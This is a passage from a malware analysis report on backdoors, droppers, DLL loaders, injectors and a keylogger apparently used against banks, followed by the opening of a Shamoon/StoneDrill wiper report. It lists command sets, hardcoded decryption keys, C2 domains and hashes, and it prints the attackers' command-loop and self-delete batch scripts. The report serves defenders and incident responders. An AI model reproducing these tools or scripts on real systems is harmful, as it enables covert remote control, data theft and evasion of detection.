Set new backdoor configuration.
0x91B934A2
Test remote host and port by opening TCP connection.
0x91B934A7
Inject an executable module into address space of explorer.exe.
0x91B93499
Get current working directory.
0x91B9349C
Delete specified file.
The same file, but compressed with an unknown packer, was discovered uploaded on VT from
Poland and Korea in November 2016. This suggests backdoor reuse in those countries. It has
the following properties:
Name: IMEKLMG.exe.dmp
MD5: 06cd99f0f9f152655469156059a8ea25
SHA1: 77c7a17ccd4775b2173a24cd358ad3f2676c3452
File size: 376832 bytes
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Link time: 2016.06.14 11:56:42 (GMT)
Linker version: 6.0
Another similar file was discovered in February 2017, distributed from a Nigerian webserver. It is
a similar backdoor but is packed with Obsidium packer.
Here is the file's general information:
MD5: 09a77c0cb8137df82efc0de5c7fee46e
SHA1: 964ba2c98b42e76f087789ab5f64e75dd370841a
File size: 176640 bytes
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Link time: 2017.02.02 04:20:19 (GMT)
Linker version: 10.0
This file is similar to the other backdoors from the arsenal. However, it contains some
differences and improvements. It uses an external file to store configuration, located at
%SYSTEMROOT%\systray.dat. The config has a fixed size of 182 bytes and has the following
structure:
XORed with 0xDE
Random 4 bytes
Magic Value: 0x12458FAE
Other data
Similar to other backdoors, it uses XOR operation on the DNS response. The XOR DWORD
constant is different here: 0xCBF9A345. The sample contains the following default hardcoded
C2 address:
tradeboard.mefound[.]com:443
To complicate analysis, the developer has implemented a protocol with dynamically changing
constants depending on the variant of the malware. So far, the backdoor "speaks the same
language" but with a different "dialect". This is implemented through a different base for all
messages. This sample supports similar commands but its Command IDs are shuffled and start
with a different number.
Command ID
Description
0x23FAE29C
Get system information: hostname, OS version, locale, list of network
interface cards with properties.
0x23FAE2A4
Sleep command. Disconnect from C2. Save current time and show
no network activity for specified time.
0x23FAE2A6
Hibernate command. Disconnect from C2 and show no network
activity. This is persistent over program restarts, because it the
module saves time when to come back online in the config file.
0x23FAE29E
List all available drives.
0x23FAE2A9
Recursively list contents of the specified directory.
0x23FAE2A7
List contents of the specified directory.
0x23FAE29F
Change current directory.
0x23FAE2AA
Run specified command.
0x23FAE2A8
Delete file(s) based on file path.
0x23FAE2AD
Wipe specified file two times with random DWORD value.
0x23FAE2B1
Compress and upload specifed file path recursively.
0x23FAE2A0
Read data from the specified file.
0x23FAE2A1
Write data to the specified file.
0x23FAE2A2
Get detailed process information: PID, Session ID, CPU performance
status, memory used, full path.
0x23FAE2AC
Kill process by name or PID.
0x23FAE2AB
Execute a command and read the output. This is done via redirection
of command output to a text file in temp directory, reading and
sending the contents of the file after the process is complete.
0x23FAE29D
Clone file timestamps from the given path.
0x23FAE2AF
Set new C2 port, save configuration file.
0x23FAE2B0
Set new C2 address, save configuration file.
0x23FAE2A3
Command to self-destruct. It drops ieinst.bat into %TEMP% directory
and runs it to self-delete.
del "%S"
nping 0
if exist "%S" goto L1
del "%0"
In addition it wipes the config file with zeroes and deletes the file as
well.
0x23FAE2A5
Terminate session and quit immediately.
This matches the description of backdoors from the Romeo set as per Novetta.
Malware 7: Passive Backdoors
MD5: b9be8d53542f5b4abad4687a891b1c03
Type: PE32 executable (GUI) Intel 80386, for MS Windows
Size: 102'400 bytes
Names: hkcmd.exe
Internal name: compact.exe
Link time: 2016.01.08 16:41:18 (GMT)
Linker version: 6.0
Product name (file version info): Windows Firewall Remote Management
Used in: Incident #1
This executable was written using the Microsoft MFC framework. The application is designed to
run as a service, however it can also start and work as a standalone non-service process. It
registers with the name of "helpsvcs". The code is organized in classes, one of which, the main
application class, has a static text variable set to "PVS", which seems to be unused in the code.
This service relies on command line arguments passed as an integer defining the port number
that it will listen to in the future. This is a reduced minimalistic way of configuring and using the
backdoor in listening mode, however there is a class that is responsible for loading or saving full
configuration block from/to the registry.
The registry value used to store the configuration depends on the parameter value
(%parameter%) passed to the function. The registry configuration is located at
HKCR\NR%parameter%\Content Setting.
The main service procedure generates a unique instance ID which is set to pseudo-randomly
selected 8 bytes. Some previous versions of the code relied on some pseudo-random values
derived from the current time and MAC addresses of available network cards, but then was
changed to a hardware independent value.
This backdoor takes care of enabling ports in the Windows Firewall by creating a new firewall
rule named "Windows Firewall Remote Management" using netsh.exe tool on Windows, which
enables an incoming connection to any executable on the TCP port that is currently used by the
backdoor. In case this rule has different name in other samples, it's quite easy to find it,
because it doesn't specify which group of rules it belongs to, unlike all other default Windows
Firewall rules. Sorting Firewall rules by group name may quickly reveal such an odd rule:
The backdoor provides process and file management, as well as the creation of TCP connection
relays.
Another backdoor based on the same code was found in the same bank, however it was made
as a standalone executable instead of a DLL. Short description and file properties are provided
below:
MD5: bbd703f0d6b1cad4ff8f3d2ee3cc073c
Link time: 2014.09.22 13:12:17 (GMT)
Linker version: 6.0
Size: 106'496 bytes
Export section timestamp: Fri Jan 8 16:41:26 UTC 2016
Original name: fmapi.dll
Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Used in: Incident #1
This file is a backdoor that listens to a port specified in the %WINDIR%\temp\scave.dat file as
an integer number. It supports about 20 commands, which enable the operator to:
Collect general system information
Search files/directories by name
Start new process as current user
Start process as another logged in user
Start process and collect output from stdout
Get file from specified path
Drop new executables into system directory
Compress and download files
List processes and their respective loaded modules
Kill processes by name
Fake file timestamp by copying it from kernel32.dll
Start a new backdoor session on another port
List active terminals sessions with details
Relay TCP connections to a remote host
The executable contains a custom PE loader code that is identical to a custom PE loader from
Lazarus Loader modules dubbed by Novetta as LimaAlfa.
This module contains a small embedded executable in the data section, encrypted with a trivial
(xor 0xb1, add 0x4f) method. The MZ header is wiped from that embedded file and is restored
during decryption routine. Some other properties of the small embedded file are listed below
(MD5: 8387ceba0c020a650e1add75d24967f2). This executable module is used to force
unloading a DLL from memory.
Malware 8: Trojan Dropper
Discovered path: C:\WINDOWS\igfxpers.exe
MD5: 6eec1de7708020a25ee38a0822a59e88
Size: 253'952 bytes
Time modified: 2016-01-18 06:08:36 (GMT)
Time accessed: 2016-08-22 12:38:37 (GMT)
Time changed: 2016-08-22 13:04:42 (GMT)
Time created: 2016-01-18 06:08:32 (GMT)
Link time: 2014-09-22 13:12:17 (GMT)
Linker version: 6.0
Other filenames: hkcmd.exe
Used in: Incident #1
This is a dropper of an embedded malware. It uses RC4 to decrypt resources and drop and start
a new process from disk. The RC4 is an MD5 of a command line argument (secret passphrase)
following "-x" parameter. The second command line argument "-e" defines the name for the new
service to be registered. The MD5 hash of the passphrase is stored in the registry and is used
by the DLL Loader in the later stage.
The binary picks one of the names to drop the payload to, and chooses a corresponding service
description when registering.
FileName
Description
wanmgr
WiFi Connection Management Service
vrddrv
Windows Virtual Disk Service
trufont
Font Cache Service
wmvdec
Media Center Network Sharing
biomgs
Biometric Service
gpcpolicy
Group Policy Server Service
diagmgs
Diagnostic Policy Client
waindex
Windows Indexing Service
trabcon
Network Traffic Balancing Service
authen
Remote Logon Authentication
The dropped file is saved into %SYSTEMROOT%\System32\%FileName%.dll on Windows 32bit and %SYSTEMROOT%\SysWow64\%FileName%.dll on Windows 64-bit.
Known command line usage:
hkcmd.exe -x -e LogonHours
We managed to find the right password (20+ characters long), which enabled us to decrypt the
payload.
Malware 9: DLL Loader
MD5: 268dca9ad0dcb4d95f95a80ec621924f
Link time: 2014.12.08 13:12:17 (GMT)
Linker version: 6.0
Size: 192'512 bytes
Export section timestamp: Fri Jan 8 16:54:25 UTC 2016
Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Original name: ext-ms-win-ntuser-dialogbox-l1-1-0.dll
Used in: Incident #1
This file is dropped by the Trojan Dropper described above. It is a malware loader service,
which gets the decryption key from the registry, uses RC4 to decrypt an embedded resource
and start the payload. The RC4 decryption key is obtained from
HKCR\NR%parameter%\ContextHandler value, which is set by the Trojan Dropper during
malware installation.
The embedded resource contains one of the Passive Backdoors described in this paper.
Another variant of the DLL loader heavily uses system registry to fetch the decryption key, and
the encrypted payload.
Name: lcsvsvc.dll
MD5: c635e0aa816ba5fe6500ca9ecf34bd06
SHA1: d7d724718065b2f386623dfaa8d1c4d22df7b72c
SHA256: 93e7e7c93cf8060eeafdbe47f67966247be761e0dfd11a23a3a055cf6b634120
File size: 1'545'216 bytes
File type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Link time: 2015.12.09 14:12:41 (GMT)
Exp. time: 2016.03.19 18:32:34 (GMT)
Linker version: 10.0
Export module Name: msshooks.dll
Used in: Incident #2
This module is similar to other 64-bit variants. However, it is registered as a service and gets an
RC4 key and the payload from the registry values of its own service. The name of the service is
not fixed and is probably set during installation stage.
Here is the registry value path for the RC4 key and encrypted payload respectively:
HKLM\SYSTEM\CurrentControlSet\Services\%SERVICENAME%\Security\Data2
HKLM\SYSTEM\CurrentControlSet\Services\%SERVICENAME%\Security\Data0
The code gets the 16-bytes RC4 key from the registry (f9 65 8b c9 ec 12 f9 ae 50 e6 26 d7 70
77 ac 1e) and encrypted payload, decrypts the payload with that key and then decrypts it one
more time with the following hardcoded key (previously seen in the backdoor management tool):
53 87 F2 11 30 3D B5 52 AD C8 28 09 E0 52 60 D0 6C C5 68 E2 70 77 3C 8F 12 C0 7B 13 D7
B3 9F 15
The final decrypted payload is loaded and started as a DLL in memory. At the time of analysis
the attackers managed to wipe the payload in the registry with a benign system file data, so only
the RC4 key remained untouched and was found in the registry.
Malware 10: Keylogger
MD5: 5ebfe9a9ab9c2c4b200508ae5d91f067
Known filenames: NCVlan.dat
File size: 73'216 bytes
Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Link time: 2016.04.06 07:38:57 (GMT)
Linker version: 10.0
Original name: grep.dll
Used in: Incident #1
This module is a user-mode keylogger. It contains an export function with an empty name,
which has the main functionality of the module.
Upon starting it creates a new thread, which suggests that it has to be loaded by a custom PE
loader (probably by the DLL Injector described in this paper, MD5:
949e1e35e09b25fca3927d3878d72bf4). The main thread registers a new class named "Shell
TrayCls%RANDOM%", where %RANDOM% value is an integer returned by the system rand
function seeded with the current system time. Next, it creates a window called "Shell
Tray%RANDOM%". The new window registers a system-wide keyboard hook and starts
recording keypresses and Unicode text in context of the clipboard. The data is saved into a
current user profile directory in a file that is named after the username via the following template
string:
NTUSER{%USERNAME%}.TxS.blf. For example, the full path that we discovered was
"C:\Users\[redacted]\NTUSER.DAT{[redacted operator]}.TxS.blf". The data written in the file is
encrypted with RC4 with the following hardcoded 64-bytes key:
53 55 4D A2 30 55 53 44 30 2C 30 3E 27 44 42 54
20 4C 49 4D 49 54 43 55 53 44 30 2C 0D 0A 43 44
54 19 53 55 4D 7F 31 55 53 44 32 36 35 2C 30 E4
37 43 44 54 98 4C 49 4D 49 54 1B 55 53 44 30 2C
The RC4 key is not entirely random and seems to contain chunks of readable ASCII text related
to some database contents or queries:
"SUM.0USD0,0>'DBT LIMITCUSD0,..CDT.SUM.1USD265,0.7CDT.LIMIT.USD0,"
We assume this is done to complicate the recognition of a password-like string by eye, or use a
value that would cause some false-positives when scanning for such a pattern.
The keylogger data file is a binary log that contains sequences of records organized in blocks
which have the following events inside:
1. Session Start (Logon):
Contains username, type of session (rdp, console, etc), session id.
2. Session Activity:
Contains active windows name and sequence of typed keys.
3. Session End (Logoff):
Contains username, session id.
Every event record contains a DWORD timestamp.
The module also starts a watchdog thread that keeps monitoring the creation of a trigger-file
called ODBCREP.HLP in the directory of the current DLL. If such file is found, the keylogger
removes the keyboard hook and unloads from the process immediately.
Malware 11: Trojan Dropper 2
Filename: gpsvc.exe
MD5: 1bfbc0c9e0d9ceb5c3f4f6ced6bcfeae
SHA1: bedceafa2109139c793cb158cec9fa48f980ff2b
File Size: 3449344 bytes
File Type: PE32+ executable (console) x86-64, for MS Windows
Link Time: 2016.12.08 00:53:20 (GMT)
Linker version: 10.0
Used in: Polish bank
This module is a command line malware dropper/installer, which contains two data containers in
the resource section.
The dropper command line takes the following:
gpsvc.exe -e %name% - drop payload on disk
gpsvc.exe -l - lists all registered services under netsvcs registry key3.
gpsvc.exe -a %param2% %param3% - registers a news service using %param2% as the
service name and %param3% as the path to DLL file of service binary. If the %param3%
doesn't contain "\" character, the code uses it as the filename in %SYSTEMROOT%\System32\.
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs
When -e option is used, the files stored in the containers are extracted, decrypted where
encryption is used, and dropped to a disk in two locations: one goes to the current directory as
%name%, another is saved into %SYSTEMROOT%\Help\%name%.chm. The value of the
%name% parameter is passed via command line argument.
The container starts with a 40 bytes header describing the start of the payload, container and
the payload data inside. The data may or may not be encrypted and there is no specific flag
identifying that in container itself. The code processing the container will know whether the
container's payload requires decryption.
Upon successful extraction of the files, the dropper will show the following message on the
command line:
Fig. Report of successful payload deployment.
The first extracted file is decrypted using the following key and Spritz algorithm, a variant of the
RC4 family: 95 B4 08 68 E4 8B 72 94 5E 61 60 BF 3F D7 F9 41 10 9A 4A C4 66 41 99 48 CC
79 F5 6A FE 5F 12 E5
The second file is extracted as-is, however, brief analysis of its header suggested that it is
encrypted with the same crypto and key.
The dropped files after decryption have the following MD5 hashes:
ad5485fac7fed74d112799600edb2fbf
16a278d0ec24458c8e47672529835117
Malware 12: DLL Injector
MD5: 16a278d0ec24458c8e47672529835117
SHA1: aa115e6587a535146b7493d6c02896a7d322879e
File size: 1515008 bytes
File type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Link time: 2016.12.08 00:53:43 (GMT)
Linker version: 10.0
Export module name: wide_loader.dll
Used in: Incident #2
This module is packed with a commercial product known as the Enigma Protector, which was
developed by a Russian software developer Vladimir Sukhov in 2004. This module is
implemented as a service binary with ServiceMain procedure. On starting it imports all
necessary system API functions, and searches for the .CHM file inside
%SYSTEMROOT%\Help\%name%.chm, where %name% matches the name of current DLL
module. Then it decrypts the payload using the Spritz algorithm with the hardcoded key: 95 B4
08 68 E4 8B 72 94 5E 61 60 BF 3F D7 F9 41 10 9A 4A C4 66 41 99 48 CC 79 F5 6A FE 5F 12
Next, it searches the target process and attempts to inject the decrypted payload module from
the CHM file into the address space of the target process. The target process can be one of
two:
1. lsass.exe
2. itself (current service process)
The process to inject the code is hardcoded and defined during the compilation of the module.
According to the code the current module injects payload into itself.
Some more similar DLL Injector samples were found in Europe and in the Middle East. The
following files were discovered:
Filename: srservice.dll
MD5: e29fe3c181ac9ddbb242688b151f3310
SHA1: 7260340b7d7b08b7a9c7e27d9226e17b7170a436
File size: 79360 bytes
File type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Link time: 2016.10.22 07:08:16 (GMT)
Exp. time: 2016.10.22 07:08:16 (GMT)
Linker version: 10.0
Export module name: wide_loader.dll
Used in: Incident #2
Filename: msv2_0.dll
MD5: 474f08fb4a0b8c9e1b88349098de10b1
SHA1: 487f64dc8e98e443886b994b121f4a0c3b1aa43f
File size: 78848 bytes
File type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Link time: 2016.12.08 00:53:39 (GMT)
Exp. time: 2016.12.08 00:53:39 (GMT)
Linker version: 10.0
Export module name: wide_loader.dll
Used in: Incident #2
Filename: SRService.dll
MD5: 07e13b985c79ef10802e75aadfac6408
SHA1: a0c02ce526d5c348519905710935e22583d81be7
File size: 79360 bytes
File type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Link time: 2016.10.22 07:08:16 (GMT)
Exp. time: 2016.10.22 07:08:16(GMT)
Linker version: 10.0
Used in: the Middle East
These files are different from those previously seen in DLL Injector, because they are not
packed with Enigma Protector. They also contain different 32-byte Spritz keys:
65 06 18 33 60 10 48 F7 57 9B 98 76 CA B5 29 60 71 CB 0B 97 7E D4 A2 F9 22 CC
4E 79 52 64 4A 75
6B EA F5 11 DF 18 6D 74 AF F2 D9 30 8D 17 72 E4 BD A1 45 2D 3F 91 EB DE DC F6
FA 4C 9E 3A 8F 98
78 CB C3 77 35 5C F2 82 8A 3A 08 71 6A D5 C3 D9 A1 1B 6A BA C5 9C 5D BC 6A
EC F0 B8 96 49 79 7A
The purpose of these variants is the same - decrypt the corresponding CHM file with the
payload and inject it in the memory of lsass.exe or current process.
The payloads found in these cases were:
fde55de117cc611826db0983bc054624 (Active Advanced Backdoor Type B)
17bc6f5b672b7e128cd5df51cdf10d37 (Active Advanced Backdoor Type B)
Malware 13: Active Backdoors 2
Filename: %name%.chm
MD5: ad5485fac7fed74d112799600edb2fbf
SHA1: a107f1046f5224fdb3a5826fa6f940a981fe65a1
File size: 1861632 bytes
File type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Link time: 2016.12.08 00:55:06 (GMT)
Export time: 2016.12.08 00:55:04 (GMT)
Linker version: 10.0
Export module name: aclui.dll
This module is dropped to the disk in .CHM file and stored in encrypted form. It can be
decrypted and started with the DLL Injector module (i.e.
16a278d0ec24458c8e47672529835117). Like the other file in the same package, it is wrapped
with Enigma Protector.
The module has no business logic starting from the entry point. Core logics are called from one
of two exported functions:
?DllRegister@@YAX_KK0K0PEAXK@Z (start backdoor with default parameters)
InitDll (start backdoor with configuration passed via parameter)
The InitDll function sets up basic requirements and prepares paths to other essential
components, which are expected in the following filepaths:
%SYSTEMROOT%\Help\*.chm
%SYSTEMROOT%\Help\*.hlp
The .hlp file from the Help Directory is loaded and decrypted using Spritz algorithm4 and the
following key:
6B EA F5 11 DF 18 6D 74 AF F2 D9 30 8D 17 72 E4 BD A1 45 2D 3F 91 EB DE DC F6 FA 4C
9E 3A 8F 98
The module contains an embedded default config which is saved to .hlp file in encrypted form if
the file is missing. It contains the following C2 information:
exbonus.mrbasic[.]com:443
Similar to Active Advanced Backdoor Type A (see md5: 2ef2703cfc9f6858ad9527588198b1b6)
it doesn't use resolved IP of the C2 directly, but XORs the DNS query result with hardcoded key
0x4F833D5B.
The backdoor protocol supports the following commands sent as a DWORD, however this
DWORD is convertible to a meaningful ASCII representation of the command as shown below:
Command ID
Description
NONE
No actions.
GINF
Get system information: hostname, OS version, CPU type, system locale,
RAM, disk free space, BIOS version and manufacturer, list of network
interface cards with properties.
SLEP
Disconnect from C2. Save current time and show no network activity for
specified time. It seems like this sleep is persistent over program restarts.
HIBN
Disconnect from C2 and show no network activity.
DRIV
Show all available drives and used/available space on them.
List files in specified directory.
DIRP
List files and directories recursively starting from specified path.
CHDR
Change current directory.
A very similar implementation of the Sprtiz algorithm in C is available at
https://github.com/jedisct1/spritz/blob/master/spritz.c
Run specified command.
RUNX
Run specified command as another Terminal Session user.
Delete file(s) based on file path pattern.
WIPE
Wipe file(s) based on file path pattern. A hardcoded pattern (not defined in
current sample) or randomly generated bytestream is used. Wiping with
random data is done three times. A DWORD constant is present from some
older wiper's code pattern: 0xE77E00FF.
MOVE
Move file.
FTIM
Set time for file(s) specified by file path pattern. Use
%systemroot%\kernel32.dll as source of timestamps. If kernel32.dll is not
found, a hardcoded value is used:
12:12:46.493 03 September 2008
NEWF
Create a directory.
ZDWN
Compress and download specified file path recursively.
DOWN
Compress and download a single file.
UPLD
Upload and uncompress file to the specified directory. The directory is created
if it doesn't exist.
PVEW
Get detailed process information: PID, Session ID, CPU performance status,
memory used, full path.
PKIL
Kill process by name or PID.
CMDL
Execute a command and read the output. This is done via redirection of
command output to a text file in temp directory, reading and sending the
contents of the file after the process is complete.
Set a flag to terminate immediately. Cleanup and shutdown.
GCFG
Get current backdoor configuration.
SCFG
Set new backdoor configuration.
TCON
Test connection with remote hosts. Open TCP connection to the specified host
and port. Send 2 random bytes to test connection.
PEEX
Inject an executable module into address space of explorer.exe.
PEIN
Inject an executable module into address space of process defined by PID.
An identical file was found in Incident #2:
Filename: msv2_0.chm.dec
MD5: 17bc6f5b672b7e128cd5df51cdf10d37
SHA1: 072245dc2339f8cd8d9d56b479ba5b8a0d581ced
File size: 729088 bytes
File type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Link time: 2016.12.08 00:55:06 (GMT)
Exp. time: 2016.12.08 00:55:04 (GMT)
Linker version: 10.0
Export module name: aclui.dll
Another similar file was used during the attack in Incident #2:
MD5: fde55de117cc611826db0983bc054624
SHA1: 1eff40761643f310a5cd7449230d5cfe9bc2e15f
File size: 729088 bytes
File type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Link time: 2016.10.22 07:09:50 (GMT)
Exp. time: 2016.10.22 07:09:48 (GMT)
Linker version: 10.0
Export module name: aclui.dll
The .hlp file from the Help Directory is loaded and decrypted using the Spritz algorithm and the
familiar key: 6B EA F5 11 DF 18 6D 74 AF F2 D9 30 8D 17 72 E4 BD A1 45 2D 3F 91 EB DE
DC F6 FA 4C 9E 3A 8F 98
The .hlp file contains references to two C2 servers, which refer to:
tradeboard.mefound[.]com:443
movis-es.ignorelist[.]com:443
The following table shows connections between known C2s
Domain
IP xor Key
(Real C2)
First Seen
Last Seen
Resolved IP (C2
disguise)
exbonus.mrbasic[.]com
218.224.125[.]66
2017-01-29
2017-02-06
129.221.254.13
exbonus.mrbasic[.]com
82.144.131[.]5
2017-02-06
2017-02-06
9.173.0.74
tradeboard.mefound[.]com
218.224.125[.]66
2017-01-29
2017-01-31
129.221.254.13
tradeboard.mefound[.]com
82.144.131[.]5
2017-02-01
2017-02-06
9.173.0.74
movis-es.ignorelist[.]com
82.144.131[.]5
2017-02-01
2017-02-06
9.173.0.74
Similar two 32-bit based samples were used in an attack on a target in Costa Rica in 2016:
2de01aac95f8703163da7633993fb447
5fbfeec97e967325af49fa4f65bb2265
These samples contain the same backdoor commands and rely on the same cryptoalgorithm
and identical hardcoded crypto key. However, these files do not contain embedded config with
default C2 domain.
Malware 14: Privileged Execution Batch
Name: msdtc.bat
MD5: 3b1dfeb298d0fb27c31944907d900c1d
SHA1: b9353e2e22cb69a9cd967181107113a12197c645
Size: 454 bytes
Type: Windows batch file
Used in: Polish bank
The following Windows batch file was found during a security sweep in one of the attacked
banks:
@echo off
SET cmd_path=C:\Windows\Temp\TMP298.tmp
copy NUL %cmd_path%
:loop
ping -n 1 1.1.1.1 > nul
for /f "tokens=*" %%a in (%cmd_path%) do (
if "%%a" equ "die" (
rem del /a %cmd_path%
rem del /a %cmd_path%.ret
echo die >> %cmd_path%.ret
goto end
) else (
echo %%a >> %cmd_path%.ret
%%a >> %cmd_path%.ret 2>&1
echo -------------------------------------------------------- >> %cmd_path%.ret
copy NUL %cmd_path%
goto loop
The purpose of this file is to execute one or more commands on the command line and redirect
the output to a file on disk. The list of commands to run is located in the following file path (let's
call it source file): C:\Windows\Temp\TMP298.tmp. Once the commands are executed, it sleeps
for one second and starts the process again until the source file contains a line with just one
word in it: "die".
This batch file opens and runs every command mentioned in the .tmp file and saves the output
to C:\Windows\Temp\TMP298.tmp.ret. Once it finds the word "die" in the source, it deletes the
source and the output file and quits. However, this batch file is either broken or implemented
with a bug. Note the line "goto end" and no label called ":end" in the batch file.
We can only speculate how this file was used in the real attack, but one theory looks to be the
most probable: it was used as an awkward way to execute commands with SYSTEM user
privileges. While it is possible to run commands as a SYSTEM user when you have
administrative privileges on a target machine, getting an interactive shell requires more work. A
batch file like this could run in the background, quietly spawning cmd.exe in a loop and nonresource exhausting mode. Passing commands to the source file would allow attackers to
conveniently execute them the next second and get the output via another text file. This infinite
loop could be easily broken with the "die" keyword. So far, we believe that this file could serve
as a privilege escalation trampoline for other unprivileged processes (such as usermode
backdoor).
Malware 14. Backdoor Management Tool
Filename: gpsvc.exe
MD5: 85d316590edfb4212049c4490db08c4b
SHA1: 4f0d7a33d23d53c0eb8b34d102cdd660fc5323a2
File Size: 753664 bytes
File Type: PE32 executable (console) Intel 80386, for MS Windows
Link Time: 2015.08.24 10:21:52 (GMT)
Linker version: 8.0
This module is a commandline tool that helps to install a new service. In addition it is capable of
doing code injection and works as a service itself. The binary is protected with Enigma
Protector.
If the module is started without commandline arguments, it quits immediately.
Depending on commandline options passed the tool may work in different modes.
1. Service Enumeration Mode
Commandline: gpsvc.exe -l
This mode is selected with commandline option -v. In this case the module get a list of
services from hardcoded registry value HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\svchost\netsvcs. This value is a present on clean Windows installation
and usually contains a list of standard service names that may generate some network activity.
The code iterates through available services and prints to standard output every service
it managed to open with read privileges (used just to confirm that the service is running). After
this the tool exits.
2. Service Activation Mode
Commandline: gpsvc.exe -s %param1% %param2%
In this mode the module registers and starts a new service if it doesn't exist. The service
name is based on the current executable filename. The following commandline is stored in the
registry to start the service:
"%self_path%" -k %param1% %param2%
Where %self_path% is full path to current executable and %param1%, %param2% are
passed as-is from current commandline.
3. File Payload Deployment
Commandline: gpsvc.exe -e %param1% %param2%
In this mode the module extracts and stores additional executable on the filesystem
(filepath is inside installation cryptocontainer). It uses %param2% to open the file as a
cryptocontainer. Cryptocontainer is encrypted with two RC4 keys:
A. KeyA which is 16 bytes of MD5 value from a string which is passed via %param1%
B. KeyB is a hardcoded 32-byte binary value: 53 87 F2 11 30 3D B5 52 AD C8 28 09 E0 52
60 D0 6C C5 68 E2 70 77 3C 8F 12 C0 7B 13 D7 B3 9F 15
It contains payload data to be installed into registry and some paths.
4. Registry Payload Deployment
Commandline: gpsvc.exe -f %param1% %param2%
This mode is very similar to "File Payload Deployment" described above, but in this case
the module is instructed to install the payload into the registry value.
5. Service Test
Commandline: gpsvc.exe -o %param1%
This mode is used to ensure that the service is running correctly by checking that a
special event object named %param1% exists.
6. Service Termination
Commandline: gpsvc.exe -t %param1%
This mode is used signal the running service via special event object named %param1%
to terminate execution.
7. Payload Injection Mode
Commandline: gpsvc.exe -k %param1% %param2%
In this mode the module assumes that it can be a service binary, so it tries to behave as
service. If it fails it falls back to regular standalone executable mode. Main purpose of this code
is to find payload in the registry, decrypt it and inject into target process memory. The payload is
stored in the following registry value:
HKLM\SYSTEM\CurrentControlSet\services\%servicename%\Security\Data2
It is encrypted with RC4, and key is taken from the registry using the following binary value (16
bytes): HKLM\SYSTEM\CurrentControlSet\services\%servicename%\Security\Data3.
The cryptocontainer used by this module contains a magic value after it's decrypted with MD5 of
the secret passed via commandline and hardcoded RC4 key. At offset 4 it has to contain the
following DWORD: 0xBC0F1DAD (AD 1D 0F BC).
Appendix: Indicator of Compromise
Malware Hosts
sap.misapor[.]ch
tradeboard.mefound[.]com:443
movis-es.ignorelist[.]com:443
update.toythieves[.]com:8080
update.toythieves[.]com:443
exbonus.mrbasic[.]com:443
Malware Hashes
02f75c2b47b1733f1889d6bbc026157c
06cd99f0f9f152655469156059a8ea25
07e13b985c79ef10802e75aadfac6408
09a77c0cb8137df82efc0de5c7fee46e
0abdaebbdbd5e6507e6db15f628d6fd7
16a278d0ec24458c8e47672529835117
17bc6f5b672b7e128cd5df51cdf10d37
198760a270a19091582a5bd841fbaec0
1bfbc0c9e0d9ceb5c3f4f6ced6bcfeae
1d0e79feb6d7ed23eb1bf7f257ce4fee
268dca9ad0dcb4d95f95a80ec621924f
2963cd266e54bd136a966bf491507bbf
2de01aac95f8703163da7633993fb447
2ef2703cfc9f6858ad9527588198b1b6
3b1dfeb298d0fb27c31944907d900c1d
459593079763f4ae74986070f47452cf
474f08fb4a0b8c9e1b88349098de10b1
579e45a09dc2370c71515bd0870b2078
5d0ffbc8389f27b0649696f0ef5b3cfe
5ebfe9a9ab9c2c4b200508ae5d91f067
5fbfeec97e967325af49fa4f65bb2265
6eec1de7708020a25ee38a0822a59e88
7413f08e12f7a4b48342a4b530c8b785
8387ceba0c020a650e1add75d24967f2
85d316590edfb4212049c4490db08c4b
949e1e35e09b25fca3927d3878d72bf4
954f50301207c52e7616cc490b8b4d3c
9d1db33d89ce9d44354dcba9ebba4c2d
ad5485fac7fed74d112799600edb2fbf
b135a56b0486eb4c85e304e636996ba1
b9be8d53542f5b4abad4687a891b1c03
bbd703f0d6b1cad4ff8f3d2ee3cc073c
c1364bbf63b3617b25b58209e4529d8c
c635e0aa816ba5fe6500ca9ecf34bd06
cb65d885f4799dbdf80af2214ecdc5fa
ce6e55abfe1e7767531eaf1036a5db3d
e29fe3c181ac9ddbb242688b151f3310
e62a52073fd7bfd251efca9906580839
f5e0f57684e9da7ef96dd459b554fded
fde55de117cc611826db0983bc054624
FROM SHAMOON TO STONEDRILL
Wipers attacking Saudi organizations and beyond
Beginning in November 2016, Kaspersky Lab observed a new wave of wiper attacks directed at
multiple targets in the Middle East. The malware used in the new attacks was a variant of the
infamous Shamoon worm that targeted Saudi Aramco and Rasgas back in 2012.
Dormant for four years, one of the most mysterious wipers in history has returned.
So far, we have observed three waves of attacks of the Shamoon 2.0 malware, activated on 17
November 2016, 29 November 2016 and 23 January 2017.
Also known as Disttrack, Shamoon is a highly destructive malware family that effectively wipes
the victim machine. A group known as the Cutting Sword of Justice took credit for the Saudi
Aramco attack by posting a Pastebin message on the day of the attack (back in 2012), and
justified the attack as a measure against the Saudi monarchy.
The Shamoon 2.0 attacks observed since November 2016 have targeted organizations in
various critical and economic sectors in Saudi Arabia. Just like the previous variant, the
Shamoon 2.0 wiper aims for the mass destruction of systems inside targeted organizations.
The new attacks share many similarities with the 2012 wave, though featuring new tools and
techniques. During the first stage, the attackers obtain administrator credentials for the victim
network. Next, they build a custom wiper (Shamoon 2.0) which leverages these credentials to
spread widely inside the organization. Finally, on a predefined date, the wiper activates,
rendering the victim
s machines completely inoperable. It should be noted that the final stages
of the attacks have their activity completely automated, without the need for communication with
the command and control center.
While investigating the Shamoon 2.0 attacks, Kaspersky Lab also discovered a previously
unknown wiper malware which appears to be targeting organizations in Saudi Arabia. We
calling this new wiper StoneDrill. StoneDrill has several
style
similarities to Shamoon, with
multiple interesting factors and techniques to allow for the better evasion of detection. In
addition to suspected Saudi targets, one victim of StoneDrill was observed on the Kaspersky
Security Network (KSN) in Europe. This makes us believe the threat actor behind StoneDrill is
expanding its wiping operations from the Middle East to Europe.
To summarize some of the characteristics of the new wiper attacks, for both Shamoon and
